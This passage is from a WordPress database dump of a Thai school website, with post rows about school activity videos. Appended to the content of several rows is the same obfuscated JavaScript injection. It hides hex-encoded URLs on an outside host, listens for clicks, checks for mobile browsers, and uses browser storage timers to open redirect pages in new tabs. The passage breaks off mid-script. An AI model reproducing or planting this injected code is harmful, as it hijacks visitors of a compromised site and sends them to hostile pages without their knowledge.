-->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วิดีโอกิจกรรมโรงเรียน','','inherit','closed','closed','','275-revision-v1','','','2024-07-30 11:33:03','2024-07-30 04:33:03','',275,'http://pakhaeng.ssk.in.th/?p=290',0,'revision','',0),
(292,1,'2024-07-30 11:36:35','2024-07-30 04:36:35','<!-- wp:paragraph -->\n<p>สุขาดี มีความสุข</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:video {\"id\":293} -->\n<figure class=\"wp-block-video\"><video autoplay controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/441527005_441923068779713_3712436577410634971_n.mp4\"></video></figure>\n<!-- /wp:video -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วิดีโอกิจกรรม สุขาดี มีความสุข','','publish','closed','closed','','%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-3','','','2024-07-31 21:55:03','2024-07-31 14:55:03','',0,'http://pakhaeng.ssk.in.th/?p=292',0,'post','',0),
(293,1,'2024-07-30 11:35:00','2024-07-30 04:35:00','','441527005_441923068779713_3712436577410634971_n','','inherit','','closed','','441527005_441923068779713_3712436577410634971_n','','','2024-07-30 11:35:00','2024-07-30 04:35:00','',292,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/441527005_441923068779713_3712436577410634971_n.mp4',0,'attachment','video/mp4',0),
(294,1,'2024-07-30 11:36:28','2024-07-30 04:36:28','','Screenshot 2024-07-30 112901','','inherit','','closed','','screenshot-2024-07-30-112901','','','2024-07-30 11:36:28','2024-07-30 04:36:28','',292,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/Screenshot-2024-07-30-112901.jpg',0,'attachment','image/jpeg',0),
(295,1,'2024-07-30 11:36:35','2024-07-30 04:36:35','<!-- wp:paragraph -->\n<p>สุขาดี มีความสุข</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:video {\"id\":293} -->\n<figure class=\"wp-block-video\"><video controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/441527005_441923068779713_3712436577410634971_n.mp4\"></video></figure>\n<!-- /wp:video -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 